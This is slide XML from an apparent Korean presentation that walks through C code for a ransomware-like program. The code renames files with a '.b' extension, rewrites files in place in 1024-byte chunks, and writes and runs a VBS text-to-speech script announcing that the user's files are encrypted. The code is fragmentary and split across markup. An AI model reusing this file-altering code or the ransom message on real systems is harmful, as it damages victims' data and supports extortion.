              <a:rPr lang="en-US" altLang="ko-KR" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>[1000], </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" dirty="0" err="1">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>fileoldname</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>[1000], *</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" dirty="0" err="1">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>filenewname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sprintf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filefname</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>, "%s/%s", </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" dirty="0" err="1">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>filepath</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>, filename);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   // filename</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="92D050"/>
                </a:solidFill>
              </a:rPr>
              <a:t>에 파일경로와 파일확장자명을 붙여서 저장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 err="1">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>sprintf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fileoldname</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>, "%s", </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" dirty="0" err="1">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>filefullname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92D050"/>
                </a:solidFill>
              </a:rPr>
              <a:t>   // </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="92D050"/>
                </a:solidFill>
              </a:rPr>
              <a:t>fileoldname</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="92D050"/>
                </a:solidFill>
              </a:rPr>
              <a:t>에 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="92D050"/>
                </a:solidFill>
              </a:rPr>
              <a:t>filefullname</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="92D050"/>
                </a:solidFill>
              </a:rPr>
              <a:t>의 문자열 값을 저장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char data[1024];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unsigned int </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" dirty="0" err="1">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>read_size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long </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" dirty="0" err="1">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>frpos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fwpos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FILE *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0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-#2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#2-2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확장자명 바꾸기</a:t>
            </a:r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19D00-513E-4C70-8EF6-11186A787506}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="3949148" y="728076"/>
            <a:ext cx="808382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 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".b") != 0)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파일네임이</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="1500" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="92D050"/>
                </a:solidFill>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1500" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="92D050"/>
                </a:solidFill>
              </a:rPr>
              <a:t>.b</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="1500" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="92D050"/>
                </a:solidFill>
              </a:rPr>
              <a:t>이면 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 = aa(</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1500" dirty="0" err="1">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>filefname</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1500" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>);   </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1500" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="92D050"/>
                </a:solidFill>
              </a:rPr>
              <a:t>// .b </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="1500" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="92D050"/>
                </a:solidFill>
              </a:rPr>
              <a:t>삭제하는 함수 실행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</a:rPr>
              <a:t>rename(</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1500" dirty="0" err="1">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>fileoldname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);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파일명을 바꿔서 저장 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1500" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="92D050"/>
                </a:solidFill>
              </a:rPr>
              <a:t>-&gt; rename </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="1500" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="92D050"/>
                </a:solidFill>
              </a:rPr>
              <a:t>함수 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="1500" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="92D050"/>
                </a:solidFill>
              </a:rPr>
              <a:t>봐야할듯</a:t>
            </a:r>
            <a:endParaRPr lang="ko-KR" altLang="en-US" sz="1500" dirty="0">
              <a:solidFill>
                <a:srgbClr val="92D050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else        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파일네임이</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="1500" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="92D050"/>
                </a:solidFill>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1500" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="92D050"/>
                </a:solidFill>
              </a:rPr>
              <a:t>.b</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="1500" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="92D050"/>
                </a:solidFill>
              </a:rPr>
              <a:t>가 아니면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;   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뉴네임에</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="1500" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="92D050"/>
                </a:solidFill>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="1500" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="92D050"/>
                </a:solidFill>
              </a:rPr>
              <a:t>풀네임</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="1500" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="92D050"/>
                </a:solidFill>
              </a:rPr>
              <a:t> 그대로 넣음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fopen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filenewname</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1500" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>, "</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1500" dirty="0" err="1">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>r+b</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1500" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>");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파일스트림</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="1500" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="92D050"/>
                </a:solidFill>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1500" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="92D050"/>
                </a:solidFill>
              </a:rPr>
              <a:t>filenewname</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="1500" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="92D050"/>
                </a:solidFill>
              </a:rPr>
              <a:t>을 바이트로 읽는 스트림 연결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if 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 == NULL)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오류나면</a:t>
            </a:r>
            <a:endParaRPr lang="ko-KR" altLang="en-US" sz="1500" dirty="0">
              <a:solidFill>
                <a:srgbClr val="92D050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".") == 0)   </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1500" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="92D050"/>
                </a:solidFill>
              </a:rPr>
              <a:t>// filename</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="1500" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="92D050"/>
                </a:solidFill>
              </a:rPr>
              <a:t>에 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1500" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="92D050"/>
                </a:solidFill>
              </a:rPr>
              <a:t>. </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="1500" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="92D050"/>
                </a:solidFill>
              </a:rPr>
              <a:t>이 없으면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 err="1">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>findfile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);   </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1500" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="92D050"/>
                </a:solidFill>
              </a:rPr>
              <a:t>//   </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="1500" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="92D050"/>
                </a:solidFill>
              </a:rPr>
              <a:t>파일 찾고 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</a:rPr>
              <a:t>return -1;            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프로그램 종료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".b") != NULL)   </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1500" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="92D050"/>
                </a:solidFill>
              </a:rPr>
              <a:t>// filename</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="1500" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="92D050"/>
                </a:solidFill>
              </a:rPr>
              <a:t>에 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1500" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="92D050"/>
                </a:solidFill>
              </a:rPr>
              <a:t>.b </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="1500" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="92D050"/>
                </a:solidFill>
              </a:rPr>
              <a:t>가 있으면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while (!</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1500" dirty="0" err="1">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>feof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))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파일포인터가</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="1500" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="92D050"/>
                </a:solidFill>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="1500" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="92D050"/>
                </a:solidFill>
              </a:rPr>
              <a:t>끝날때까지</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="1500" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="92D050"/>
                </a:solidFill>
              </a:rPr>
              <a:t> 돌아라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 err="1">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>fwpos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ftell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파일포인터의</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="1500" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="92D050"/>
                </a:solidFill>
              </a:rPr>
              <a:t> 현재위치를 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1500" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="92D050"/>
                </a:solidFill>
              </a:rPr>
              <a:t>fwpos</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="1500" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="92D050"/>
                </a:solidFill>
              </a:rPr>
              <a:t>에 저장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fread</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1500" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>(data, 1, 1024, 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en-US" altLang="ko-KR" sz="1500" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="92D050"/>
                </a:solidFill>
              </a:rPr>
              <a:t>datd</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="1500" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="92D050"/>
                </a:solidFill>
              </a:rPr>
              <a:t>에 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1500" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="92D050"/>
                </a:solidFill>
              </a:rPr>
              <a:t>1</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="1500" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="92D050"/>
                </a:solidFill>
              </a:rPr>
              <a:t>크기를 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1500" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="92D050"/>
                </a:solidFill>
              </a:rPr>
              <a:t>1024</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="1500" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="92D050"/>
                </a:solidFill>
              </a:rPr>
              <a:t>번 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1500" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="92D050"/>
                </a:solidFill>
              </a:rPr>
              <a:t>fp</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="1500" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="92D050"/>
                </a:solidFill>
              </a:rPr>
              <a:t>스트림에서 읽음</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1500" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="92D050"/>
                </a:solidFill>
              </a:rPr>
              <a:t>.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1500" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="92D050"/>
                </a:solidFill>
              </a:rPr>
              <a:t>         // </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="1500" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="92D050"/>
                </a:solidFill>
              </a:rPr>
              <a:t>읽어들인</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="1500" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="92D050"/>
                </a:solidFill>
              </a:rPr>
              <a:t> 원소의 개수만큼 리턴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   </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1500" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>if (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 == 0)break;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>
                <a:solidFill>
                  <a:srgbClr val="92D050"/>
                </a:solidFill>
              </a:rPr>
              <a:t>하나도 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="1500" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="92D050"/>
                </a:solidFill>
              </a:rPr>
              <a:t>못읽으면</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="1500" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="92D050"/>
                </a:solidFill>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="1500" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="92D050"/>
                </a:solidFill>
              </a:rPr>
              <a:t>반복문</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="1500" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="92D050"/>
                </a:solidFill>
              </a:rPr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6915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-#2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#3 TTS</a:t>
            </a:r>
            <a:endParaRPr lang="ko-KR" altLang="en-US" sz="2400" dirty="0">
              <a:solidFill>
                <a:srgbClr val="FFFF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D4D5-D1C4-45E5-BCFE-CD01888E9D5B}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4373217" y="1537252"/>
            <a:ext cx="7460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void talk()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FILE *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fopen</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>("a.vbs", "w"); </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="92D050"/>
                </a:solidFill>
              </a:rPr>
              <a:t>//</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="92D050"/>
                </a:solidFill>
              </a:rPr>
              <a:t>vbs</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="92D050"/>
                </a:solidFill>
              </a:rPr>
              <a:t>스크립트 사용한 쓰기 파일 열기</a:t>
            </a:r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fputs</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>("</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" dirty="0" err="1">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>createobject</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>(\"</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" dirty="0" err="1">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>sapi.spvoice</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>\").speak \"</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>주 의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주 의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주 의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당신의 문서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그리고 다른 중요한 파일들이 암호화 되었습니다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이 창을 끌 시 복구 할 수 없습니다</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>.\" \n", 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en-US" altLang="ko-KR" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>); </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="92D050"/>
                </a:solidFill>
              </a:rPr>
              <a:t>//</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="92D050"/>
                </a:solidFill>
              </a:rPr>
              <a:t>파일에 주의 문구 쓰기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fclose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fp</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>); //</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>파일 닫기</a:t>
            </a:r>
            <a:endParaRPr lang="ko-KR" altLang="en-US" dirty="0">
              <a:solidFill>
                <a:srgbClr val="92D050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system("a.vbs"); </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="92D050"/>
                </a:solidFill>
              </a:rPr>
              <a:t>//</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="92D050"/>
                </a:solidFill>
              </a:rPr>
              <a:t>시스템 작동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34140"/>
            <a:ext cx="12192000" cy="33818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266487" y="2443298"/>
            <a:ext cx="1245970" cy="1169339"/>
            <a:chOff x="2156164" y="2649538"/>
            <a:chExt cx="521721" cy="489634"/>
          </a:xfrm>
          <a:solidFill>
            <a:schemeClr val="bg1">
              <a:lumMod val="95000"/>
            </a:schemeClr>
          </a:solidFill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156164" y="2649538"/>
              <a:ext cx="515938" cy="411163"/>
            </a:xfrm>
            <a:custGeom>
              <a:avLst/>
              <a:gdLst>
                <a:gd name="T0" fmla="*/ 37 w 650"/>
                <a:gd name="T1" fmla="*/ 237 h 520"/>
                <a:gd name="T2" fmla="*/ 62 w 650"/>
                <a:gd name="T3" fmla="*/ 292 h 520"/>
                <a:gd name="T4" fmla="*/ 66 w 650"/>
                <a:gd name="T5" fmla="*/ 315 h 520"/>
                <a:gd name="T6" fmla="*/ 55 w 650"/>
                <a:gd name="T7" fmla="*/ 325 h 520"/>
                <a:gd name="T8" fmla="*/ 21 w 650"/>
                <a:gd name="T9" fmla="*/ 338 h 520"/>
                <a:gd name="T10" fmla="*/ 0 w 650"/>
                <a:gd name="T11" fmla="*/ 345 h 520"/>
                <a:gd name="T12" fmla="*/ 57 w 650"/>
                <a:gd name="T13" fmla="*/ 377 h 520"/>
                <a:gd name="T14" fmla="*/ 151 w 650"/>
                <a:gd name="T15" fmla="*/ 432 h 520"/>
                <a:gd name="T16" fmla="*/ 181 w 650"/>
                <a:gd name="T17" fmla="*/ 455 h 520"/>
                <a:gd name="T18" fmla="*/ 183 w 650"/>
                <a:gd name="T19" fmla="*/ 461 h 520"/>
                <a:gd name="T20" fmla="*/ 182 w 650"/>
                <a:gd name="T21" fmla="*/ 513 h 520"/>
                <a:gd name="T22" fmla="*/ 243 w 650"/>
                <a:gd name="T23" fmla="*/ 489 h 520"/>
                <a:gd name="T24" fmla="*/ 286 w 650"/>
                <a:gd name="T25" fmla="*/ 472 h 520"/>
                <a:gd name="T26" fmla="*/ 310 w 650"/>
                <a:gd name="T27" fmla="*/ 469 h 520"/>
                <a:gd name="T28" fmla="*/ 326 w 650"/>
                <a:gd name="T29" fmla="*/ 469 h 520"/>
                <a:gd name="T30" fmla="*/ 352 w 650"/>
                <a:gd name="T31" fmla="*/ 466 h 520"/>
                <a:gd name="T32" fmla="*/ 369 w 650"/>
                <a:gd name="T33" fmla="*/ 463 h 520"/>
                <a:gd name="T34" fmla="*/ 394 w 650"/>
                <a:gd name="T35" fmla="*/ 467 h 520"/>
                <a:gd name="T36" fmla="*/ 435 w 650"/>
                <a:gd name="T37" fmla="*/ 473 h 520"/>
                <a:gd name="T38" fmla="*/ 452 w 650"/>
                <a:gd name="T39" fmla="*/ 476 h 520"/>
                <a:gd name="T40" fmla="*/ 488 w 650"/>
                <a:gd name="T41" fmla="*/ 483 h 520"/>
                <a:gd name="T42" fmla="*/ 522 w 650"/>
                <a:gd name="T43" fmla="*/ 490 h 520"/>
                <a:gd name="T44" fmla="*/ 650 w 650"/>
                <a:gd name="T45" fmla="*/ 277 h 520"/>
                <a:gd name="T46" fmla="*/ 631 w 650"/>
                <a:gd name="T47" fmla="*/ 275 h 520"/>
                <a:gd name="T48" fmla="*/ 596 w 650"/>
                <a:gd name="T49" fmla="*/ 265 h 520"/>
                <a:gd name="T50" fmla="*/ 584 w 650"/>
                <a:gd name="T51" fmla="*/ 229 h 520"/>
                <a:gd name="T52" fmla="*/ 608 w 650"/>
                <a:gd name="T53" fmla="*/ 154 h 520"/>
                <a:gd name="T54" fmla="*/ 576 w 650"/>
                <a:gd name="T55" fmla="*/ 166 h 520"/>
                <a:gd name="T56" fmla="*/ 522 w 650"/>
                <a:gd name="T57" fmla="*/ 187 h 520"/>
                <a:gd name="T58" fmla="*/ 496 w 650"/>
                <a:gd name="T59" fmla="*/ 179 h 520"/>
                <a:gd name="T60" fmla="*/ 490 w 650"/>
                <a:gd name="T61" fmla="*/ 120 h 520"/>
                <a:gd name="T62" fmla="*/ 462 w 650"/>
                <a:gd name="T63" fmla="*/ 162 h 520"/>
                <a:gd name="T64" fmla="*/ 415 w 650"/>
                <a:gd name="T65" fmla="*/ 234 h 520"/>
                <a:gd name="T66" fmla="*/ 391 w 650"/>
                <a:gd name="T67" fmla="*/ 262 h 520"/>
                <a:gd name="T68" fmla="*/ 379 w 650"/>
                <a:gd name="T69" fmla="*/ 252 h 520"/>
                <a:gd name="T70" fmla="*/ 406 w 650"/>
                <a:gd name="T71" fmla="*/ 80 h 520"/>
                <a:gd name="T72" fmla="*/ 404 w 650"/>
                <a:gd name="T73" fmla="*/ 56 h 520"/>
                <a:gd name="T74" fmla="*/ 378 w 650"/>
                <a:gd name="T75" fmla="*/ 76 h 520"/>
                <a:gd name="T76" fmla="*/ 352 w 650"/>
                <a:gd name="T77" fmla="*/ 88 h 520"/>
                <a:gd name="T78" fmla="*/ 323 w 650"/>
                <a:gd name="T79" fmla="*/ 59 h 520"/>
                <a:gd name="T80" fmla="*/ 294 w 650"/>
                <a:gd name="T81" fmla="*/ 14 h 520"/>
                <a:gd name="T82" fmla="*/ 284 w 650"/>
                <a:gd name="T83" fmla="*/ 8 h 520"/>
                <a:gd name="T84" fmla="*/ 265 w 650"/>
                <a:gd name="T85" fmla="*/ 64 h 520"/>
                <a:gd name="T86" fmla="*/ 251 w 650"/>
                <a:gd name="T87" fmla="*/ 102 h 520"/>
                <a:gd name="T88" fmla="*/ 229 w 650"/>
                <a:gd name="T89" fmla="*/ 102 h 520"/>
                <a:gd name="T90" fmla="*/ 201 w 650"/>
                <a:gd name="T91" fmla="*/ 88 h 520"/>
                <a:gd name="T92" fmla="*/ 185 w 650"/>
                <a:gd name="T93" fmla="*/ 82 h 520"/>
                <a:gd name="T94" fmla="*/ 203 w 650"/>
                <a:gd name="T95" fmla="*/ 144 h 520"/>
                <a:gd name="T96" fmla="*/ 229 w 650"/>
                <a:gd name="T97" fmla="*/ 245 h 520"/>
                <a:gd name="T98" fmla="*/ 225 w 650"/>
                <a:gd name="T99" fmla="*/ 269 h 520"/>
                <a:gd name="T100" fmla="*/ 179 w 650"/>
                <a:gd name="T101" fmla="*/ 225 h 520"/>
                <a:gd name="T102" fmla="*/ 137 w 650"/>
                <a:gd name="T103" fmla="*/ 18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0" h="520">
                  <a:moveTo>
                    <a:pt x="134" y="240"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="32" y="227"/>
                  </a:lnTo>
                  <a:lnTo>
